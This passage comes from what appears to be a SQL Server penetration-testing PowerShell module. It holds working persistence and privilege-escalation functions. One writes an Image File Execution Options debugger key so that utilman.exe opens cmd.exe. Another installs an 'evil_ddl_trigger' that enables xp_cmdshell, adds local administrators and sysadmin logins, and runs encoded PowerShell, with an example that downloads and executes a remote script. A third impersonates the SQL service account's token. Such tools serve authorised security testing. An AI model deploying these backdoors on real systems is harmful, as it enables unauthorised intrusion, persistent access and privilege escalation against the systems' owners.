PowerShell.exe -C "Write-Output hacker | Out-File C:\temp\iamahacker.txt" VERBOSE: SQLServer1\STANDARDDEV2014 : Registry entry written. VERBOSE: SQLServer1\STANDARDDEV2014 : Done. .Notes http://sqlmag.com/t-sql/using-t-sql-manipulate-registry #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Name of the registry value.')] [string]$FileName= "utilman.exe", [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'The command to run.')] [string]$Command = 'c:\windows\system32\cmd.exe', [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin # Get SQL Server version number $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber if($SQLVersionFull) { $SQLVersionShort = $SQLVersionFull.Split('.')[0] } # Check if this can actually run with the current login if($IsSysadmin -ne "Yes") { Write-Verbose "$Instance : This function requires sysadmin privileges. Done." Return }else{ Write-Verbose "$Instance : Attempting to write debugger: $FileName" Write-Verbose "$Instance : Attempting to write command: $Command" } # Setup query for registry update $Query = " --- This will create a registry key through SQL Server (as sysadmin) -- to run a defined debugger (any command) instead of intended command -- in the example utilman.exe can be replace with cmd.exe and executed on demand via rdp --- note: this could easily be a empire/other payload EXEC master..xp_regwrite @rootkey = 'HKEY_LOCAL_MACHINE', @key = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$FileName', @value_name = 'Debugger', @type = 'REG_SZ', @value = '$Command'" # Execute query $Results = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Setup query to verify the write is successful $CheckQuery = " ------------------------------------------------------------------------- -- Get Windows Auto Login Credentials from the Registry ------------------------------------------------------------------------- -- Get AutoLogin Default Domain DECLARE @CheckValue SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$FileName', @value_name = N'Debugger', @value = @CheckValue output -- Display Results SELECT CheckValue = @CheckValue" # Execute query $CheckResults = Get-SQLQuery -Instance $Instance -Query $CheckQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CheckCommand = $CheckResults.CheckValue if($CheckCommand.length -ge 2){ Write-Verbose "$Instance : Registry entry written." }else{ Write-Verbose "$Instance : Fail to write to registry due to insufficient privileges." } } End { # Return message Write-Verbose "$Instance : Done." } } # ---------------------------------- # Get-SQLPersistTriggerDDL # ---------------------------------- # Author: Scott Sutherland Function Get-SQLPersistTriggerDDL { <# .SYNOPSIS This script can be used backdoor a Windows system using a SQL Server DDL event triggers. .DESCRIPTION This script can be used backdoor a Windows system using a SQL Server DDL event triggers. As a result, the associated TSQL will execute when any DDL_SERVER_LEVEL_EVENTS occur. This script supports the executing operating system and PowerShell commands as the SQL Server service account using the native xp_cmdshell stored procedure. The script also support add a new sysadmin. This script can be run as the current Windows user or a SQL Server login can be provided. Note: This script requires sysadmin privileges. The DDL_SERVER_LEVEL_EVENTS include: CREATE DATABASE ALTER DATABASE DROP DATABASE CREATE_ENDPOINT ALTER_ENDPOINT DROP_ENDPOINT ADD_ROLE_MEMBER DROP_ROLE_MEMBER ADD_SERVER_ROLE_MEMBER DROP_SERVER_ROLE_MEMBER ALTER_AUTHORIZATION_SERVER DENY_SERVER GRANT_SERVER REVOKE_SERVER ALTER_LOGIN CREATE_LOGIN DROP_LOGIN Feel free to change "DDL_SERVER_LEVEL_EVENTS" to "DDL_EVENTS" if you want more coverage, but I haven't had time to test it. .EXAMPLE Create a DDL trigger to add a new sysadmin. The example shows the script being run using a SQL Login. PS C:\> Get-SQLPersistTriggerDDL -SqlServerInstance "SERVERNAME\INSTANCENAME" -SqlUser MySQLAdmin -SqlPass MyPassword123! -NewSqlUser mysqluser -NewSqlPass NewPassword123! .EXAMPLE Create a DDL trigger to add a local administrator to the Windows OS via xp_cmdshell. The example shows the script being run as the current windows user. PS C:\> Get-SQLPersistTriggerDDL -SqlServerInstance "SERVERNAME\INSTANCENAME" -NewOsUser myosuser -NewOsPass NewPassword123! .EXAMPLE Create a DDL trigger to run a PowerShell command via xp_cmdshell. The example below downloads a PowerShell script and from the internet and executes it. The example shows the script being run as the current Windows user. PS C:\> Get-SQLPersistTriggerDDL -Verbose -SqlServerInstance "SERVERNAME\INSTANCENAME" -PsCommand "IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1')" .EXAMPLE Remove evil_DDL_trigger as the current Windows user. PS C:\> Get-SQLPersistTriggerDDL -Verbose -SqlServerInstance "SERVERNAME\INSTANCENAME" -Remove .LINK http://www.netspi.com https://technet.microsoft.com/en-us/library/ms186582(v=sql.90).aspx .NOTES Author: Scott Sutherland - 2016, NetSPI #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'Username to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'Password to authenticate with.')] [string]$Password, [Parameter(Mandatory=$false, HelpMessage='Set username for new SQL Server sysadmin login.')] [string]$NewSqlUser, [Parameter(Mandatory=$false, HelpMessage='Set password for new SQL Server sysadmin login.')] [string]$NewSqlPass, [Parameter(Mandatory=$false, HelpMessage='Set username for new Windows local administrator account.')] [string]$NewOsUser, [Parameter(Mandatory=$false, HelpMessage='Set password for new Windows local administrator account.')] [string]$NewOsPass, [Parameter(Mandatory=$false, HelpMessage='Create trigger that will run the provide PowerShell command.')] [string]$PsCommand, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory=$false, HelpMessage='This will remove the trigger named evil_DDL_trigger create by this script.')] [Switch]$Remove ) # ----------------------------------------------- # Setup database connection string # ----------------------------------------------- # Create fun connection object $conn = New-Object System.Data.SqlClient.SqlConnection # Set authentication type and create connection string if($Username){ # SQL login / alternative domain credentials Write-Verbose "$Instance : Attempting to authenticate to $Instance with SQL login $Username..." $conn.ConnectionString = "Server=$Instance;Database=master;User ID=$Username;Password=$Password;" [string]$ConnectUser = $Username }else{ # Trusted connection Write-Verbose "$Instance : Attempting to authenticate to $Instance as the current Windows user..." $conn.ConnectionString = "Server=$Instance;Database=master;Integrated Security=SSPI;" $UserDomain = [Environment]::UserDomainName $DUsername = [Environment]::UserName $ConnectUser = "$UserDomain\$DUsername" } # ------------------------------------------------------- # Test database connection # ------------------------------------------------------- try{ $conn.Open() Write-Verbose "$Instance : Connected." $conn.Close() }catch{ $ErrorMessage = $_.Exception.Message Write-Verbose "$Instance : Connection failed" Write-Verbose "$Instance : Error: $ErrorMessage" Break } # ------------------------------------------------------- # Check if the user is a sysadmin # ------------------------------------------------------- # Open db connection $conn.Open() # Setup query $Query = "select is_srvrolemember('sysadmin') as sysstatus" # Execute query $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) $results = $cmd.ExecuteReader() # Parse query results $TableIsSysAdmin = New-Object System.Data.DataTable $TableIsSysAdmin.Load($results) # Check if current user is a sysadmin $TableIsSysAdmin | Select-Object -First 1 sysstatus | foreach { $Checksysadmin = $_.sysstatus if ($Checksysadmin -ne 0){ Write-Verbose "$Instance : Confirmed Sysadmin access." }else{ Write-Verbose "$Instance : The current user does not have sysadmin privileges." Write-Verbose "$Instance : Sysadmin privileges are required." Break } } # Close db connection $conn.Close() # ------------------------------------------------------- # Enabled Show Advanced Options - needed for xp_cmdshell # ------------------------------------------------------- # Status user Write-Verbose "$Instance : Enabling 'Show Advanced Options', if required..." # Open db connection $conn.Open() # Setup query $Query = "IF (select value_in_use from sys.configurations where name = 'Show Advanced Options') = 0 EXEC ('sp_configure ''Show Advanced Options'',1;RECONFIGURE')" # Execute query $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) $results = $cmd.ExecuteReader() # Close db connection $conn.Close() # ------------------------------------------------------- # Enabled xp_cmdshell - needed for os commands # ------------------------------------------------------- Write-Verbose "$Instance : Enabling 'xp_cmdshell', if required..." # Open db connection $conn.Open() # Setup query $Query = "IF (select value_in_use from sys.configurations where name = 'xp_cmdshell') = 0 EXEC ('sp_configure ''xp_cmdshell'',1;RECONFIGURE')" # Execute query $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) $results = $cmd.ExecuteReader() # Close db connection $conn.Close() # ------------------------------------------------------- # Check if the service account is local admin # ------------------------------------------------------- Write-Verbose "$Instance : Checking if service account is a local administrator..." # Open db connection $conn.Open() # Setup query $Query = @" -- Setup reg path DECLARE @SQLServerInstance varchar(250) if @@SERVICENAME = 'MSSQLSERVER' BEGIN set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' END ELSE BEGIN set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250)) END -- Grab service account from service's reg path DECLARE @ServiceaccountName varchar(250) EXECUTE master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', @SQLServerInstance, N'ObjectName',@ServiceAccountName OUTPUT, N'no_output' DECLARE @MachineType SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SYSTEM\CurrentControlSet\Control\ProductOptions', @value_name = N'ProductType', @value = @MachineType output -- Grab more info about the server SELECT @ServiceAccountName as SvcAcct "@ # Execute query $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) $results = $cmd.ExecuteReader() # Parse query results $TableServiceAccount = New-Object System.Data.DataTable $TableServiceAccount.Load($results) $SqlServeServiceAccountDirty = $TableServiceAccount | select SvcAcct -ExpandProperty SvcAcct $SqlServeServiceAccount = $SqlServeServiceAccountDirty -replace '\.\\','' # Close db connection $conn.Close() # Open db connection $conn.Open() # Setup query $Query = "EXEC master..xp_cmdshell 'net localgroup Administrators';" # Execute query $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) $results = $cmd.ExecuteReader() # Parse query results $TableServiceAccountPriv = New-Object System.Data.DataTable $TableServiceAccountPriv.Load($results) # Close db connection $conn.Close() if($SqlServeServiceAccount -eq "LocalSystem" -or $TableServiceAccountPriv -contains "$SqlServeServiceAccount"){ Write-Verbose "$Instance : The service account $SqlServeServiceAccount has local administrator privileges." $SvcAdmin = 1 }else{ Write-Verbose "$Instance : The service account $SqlServeServiceAccount does NOT have local administrator privileges." $SvcAdmin = 0 } # ------------------- # Setup the pscommand # ------------------- $Query_PsCommand = "" if($PsCommand){ # Status user Write-Verbose "$Instance : Creating encoding PowerShell payload..." # Check for local administrator privs if($SvcAdmin -eq 0){ Write-Verbose "$Instance : Note: PowerShell won't be able to take administrative actions due to the service account configuration." } # This encoding method was based on a function by Carlos Perez # https://raw.githubusercontent.com/darkoperator/Posh-SecMod/master/PostExploitation/PostExploitation.psm1 # Encode PowerShell command $CmdBytes = [Text.Encoding]::Unicode.GetBytes($PsCommand) $EncodedCommand = [Convert]::ToBase64String($CmdBytes) # Check if PowerShell command is too long If ($EncodedCommand.Length -gt 8100) { Write-Verbose "PowerShell encoded payload is too long so the PowerShell command will not be added." }else{ # Create query $Query_PsCommand = "EXEC master..xp_cmdshell ''PowerShell -enc $EncodedCommand'';" Write-Verbose "$Instance : Payload generated." } }else{ Write-Verbose "$Instance : Note: No PowerShell will be executed, because the parameters weren't provided." } # ------------------- # Setup newosuser # ------------------- $Query_OsAddUser = "" if($NewOsUser){ # Status user Write-Verbose "$Instance : Creating payload to add OS user..." # Check for local administrator privs if($SvcAdmin -eq 0){ # Status user Write-Verbose "$Instance : The service account does not have local administrator privileges so no OS admin can be created. Aborted." Break }else{ # Create query $Query_OsAddUser = "EXEC master..xp_cmdshell ''net user $NewOsUser $NewOsPass /add & net localgroup administrators /add $NewOsUser'';" # Status user Write-Verbose "$Instance : Payload generated." } }else{ Write-Verbose "$Instance : Note: No OS admin will be created, because the parameters weren't provided." } # ----------------------- # Setup add sysadmin user # ----------------------- $Query_SysAdmin = "" if($NewSqlUser){ # Status user Write-Verbose "$Instance : Generating payload to add sysadmin..." # Create query $Query_SysAdmin = "IF NOT EXISTS (SELECT * FROM sys.syslogins WHERE name = ''$NewSqlUser'') exec(''CREATE LOGIN $NewSqlUser WITH PASSWORD = ''''$NewSqlPass'''';EXEC sp_addsrvrolemember ''''$NewSqlUser'''', ''''sysadmin'''';'')" # Status user Write-Verbose "$Instance : Payload generated." }else{ Write-Verbose "$Instance : Note: No sysadmin will be created, because the parameters weren't provided." } # ------------------------------------------------------- # Create DDL trigger # ------------------------------------------------------- if(($NewSqlUser) -or ($NewOsUser) -or ($PsCommand)){ # Status user Write-Verbose "$Instance : Creating trigger..." # --------------------------- # Create procedure # --------------------------- # Open db connection $conn.Open() # Setup query $Query = "IF EXISTS (SELECT * FROM sys.server_triggers WHERE name = 'evil_ddl_trigger') DROP TRIGGER [evil_ddl_trigger] ON ALL SERVER exec('CREATE Trigger [evil_ddl_trigger] on ALL Server For DDL_SERVER_LEVEL_EVENTS AS $Query_OsAddUser $Query_SysAdmin $Query_PsCommand')" $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) $results = $cmd.ExecuteReader() # Close db connection $conn.Close() Write-Verbose "$Instance : The evil_ddl_trigger trigger has been added. It will run with any DDL event." }else{ Write-Verbose "$Instance : No options were provided." } # ------------------------------------------------------- # REmove DDL trigger # ------------------------------------------------------- if($Remove){ # Status user Write-Verbose "$Instance : Removing trigger named evil_DDL_trigger..." # --------------------------- # Create procedure # --------------------------- # Open db connection $conn.Open() # Setup query $Query = "IF EXISTS (SELECT * FROM sys.server_triggers WHERE name = 'evil_ddl_trigger') DROP TRIGGER [evil_ddl_trigger] ON ALL SERVER" $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) $results = $cmd.ExecuteReader() # Close db connection $conn.Close() Write-Verbose "$Instance : The evil_ddl_trigger trigger has been been removed." } Write-Verbose "$Instance : All done." } #endregion ######################################################################### # #region PRIVILEGE ESCALATION FUNCTIONS # ######################################################################### # --------------------------------------- # Template Function # --------------------------------------- # Author: Scott Sutherland # Note: This is just a template for building other escalation functions. Function Invoke-SQLAuditTemplate { [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: [VULNERABILITY NAME]" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: [VULNERABILITY NAME]." Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS." } # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = '' $Description = '' $Remediation = '' $Severity = '' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = "[CurrentCommand] -Instance $Instance -Exploit" $Details = '' $Reference = '' $Author = 'First Last (Twitter), Company Year' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # $IsVulnerable = "No" or $IsVulnerable = "Yes" # ----------------------------------------------------------------- # Check for exploit dependancies # Note: Typically secondary configs required for dba/os execution # ----------------------------------------------------------------- # $IsExploitable = "No" or $IsExploitable = "Yes" # ----------------------------------------------------------------- # Exploit Vulnerability # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- # $Exploited = "No" or $Exploited = "Yes" # Add to report example $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: [VULNERABILITY NAME]" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # ---------------------------------- # Invoke-SQLImpersonateService # ---------------------------------- # Author: Mike Manzotti (@mmanzo_) and Scott Sutherland Function Invoke-SQLImpersonateService { <# .PARAMETER Instance This function can be used to impersonate a local SQL Server service account. .EXAMPLE PS C:\> Invoke-SQLImpersonateService -Instance SQLServer1\STANDARDDEV2014 -Verbose VERBOSE: SQLServer1\STANDARDDEV2014 : Impersonating SQLServer1\STANDARDDEV2014 service account VERBOSE: SQLServer1\STANDARDDEV2014 : - Process ID: 1234 VERBOSE: SQLServer1\STANDARDDEV2014 : - Service Account: LocalSystem #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'This can be used to revert to the original Windows user context.')] [switch]$Rev2Self, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { } Process { # Revert to original user context if flag is provided if($Rev2Self){ Invoke-TokenManipulation -RevToSelf | Out-Null Return } # Check for provide instance if(-not $Instance){ Write-Verbose "$Instance : No instance provided." Return } # Get current user name $WinCurrentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().name # Verify local administrator privileges $IsAdmin = Get-SQLLocalAdminCheck # Return if the current user does not have local admin privs if($IsAdmin -ne $true){ write-verbose "$Instance : $WinCurrentUserName DOES NOT have local admin privileges." return }else{ write-verbose "$Instance : $WinCurrentUserName has local admin privileges." } # Check for running sql service processes that match the instance Write-Verbose -Message "$Instance : Impersonating SQL Server process:" [int]$TargetPid = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceProcessId -ExpandProperty ServiceProcessId [string]$TargetServiceAccount = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceAccount -ExpandProperty ServiceAccount # Return if no matches exist if ($TargetPid -eq 0){ Write-Verbose -Message "$Instance : No process running for provided instance..." return } # Status user if a match is found Write-Verbose -Message "$Instance : - Process ID: $TargetPid" Write-Verbose -Message "$Instance : - ServiceAccount: $TargetServiceAccount" # Attempt impersonation try{ Get-Process | Where-Object {$_.id -like $TargetPid} | Invoke-TokenManipulation -Instance $Instance -ImpersonateUser -ErrorAction Continue | Out-Null }catch{ $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Impersonation failed." Write-Verbose -Message " $Instance : $ErrorMessage" return } Write-Verbose -Message "$Instance : Done." } End { } } # --------------------------------------- # Invoke-SQLAuditSQLiSpExecuteAs # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditSQLiSpExecuteAs { <# .SYNOPSIS This will return stored procedures using dynamic SQL and the EXECUTE AS OWNER clause that may suffer from SQL injection. There is also an options to check for .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE PS C:\> Invoke-SQLAuditSQLiSpExecuteAs -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : Potential SQL Injection Description : The affected procedure is using dynamic SQL and the "EXECUTE AS OWNER" clause. As a result, it may be possible to impersonate the procedure owner if SQL injection is possible. server. Remediation : Consider using parameterized queries instead of concatenated strings, and use signed procedures instead of the "EXECUTE AS OWNER" clause.' Severity : High IsVulnerable : Yes IsExploitable : No Exploited : No ExploitCmd : No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance SQLServer1\STANDARDDEV2014 -Keyword "EXECUTE AS OWNER" Details : The testdb.dbo.sp_vulnerable stored procedure is affected. Reference : https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditSQLiSpExecuteAs -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Potential SQL Injection - EXECUTE AS OWNER" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - EXECUTE AS OWNER." Return } # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Potential SQL Injection - EXECUTE AS OWNER' $Description = 'The affected procedure is using dynamic SQL and the "EXECUTE AS OWNER" clause. As a result, it may be possible to impersonate the procedure owner if SQL injection is possible.' $Remediation = 'Consider using parameterized queries instead of concatenated strings, and use signed procedures instead of the "EXECUTE AS OWNER" clause.' $Severity = 'High' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = "No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance $Instance -Keyword `"EXECUTE AS OWNER`"'" $Details = '' $Reference = 'https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # $IsVulnerable = "No" or $IsVulnerable = "Yes" # Get SP with dynamic sql and execute as owner $SQLiResults = Get-SQLStoredProcedureSQLi -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Keyword "EXECUTE AS OWNER" # Check for results if($SQLiResults.rows.count -ge 1){ # Confirmed vulnerable $IsVulnerable = "Yes" $IsExploitable = "Unknown" # Add information to finding for each instance of potential sqli $SQLiResults | ForEach-Object{ # Set instance values $DatabaseName = $_.DatabaseName $SchemaName = $_.SchemaName $ProcedureName = $_.ProcedureName $ObjectName = "$DatabaseName.$SchemaName.$ProcedureName" $Details = "The $ObjectName stored procedure is affected." # Add to report $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } # ------------------------------------------------------------------ # Exploit Vulnerability # ------------------------------------------------------------------ if($Exploit){ Write-Verbose "$Instance : No automatic exploitation option has been provided. Uninformed exploitation of SQLi can have a negative impact on production environments." } # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - EXECUTE AS OWNER" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditSQLiSpSigned # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditSQLiSpSigned { <# .SYNOPSIS This will return stored procedures using dynamic SQL and the EXECUTE AS OWNER clause that may suffer from SQL injection. There is also an options to check for .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE PS C:\> Invoke-SQLAuditSQLiSpSigned -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : Potential SQL Injection Description : The affected procedure is using dynamic SQL and is signed. As a result, it may be possible to impersonate the procedure owner if SQL injection is possible. server. Remediation : Consider using parameterized queries instead of concatenated strings, and use signed procedures instead of the "EXECUTE AS OWNER" clause.' Severity : High IsVulnerable : Yes IsExploitable : No Exploited : No ExploitCmd : No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance SQLServer1\STANDARDDEV2014 -Keyword "EXECUTE AS OWNER" Details : The testdb.dbo.sp_vulnerable stored procedure is affected. Reference : https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditSQLiSpSigned -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] 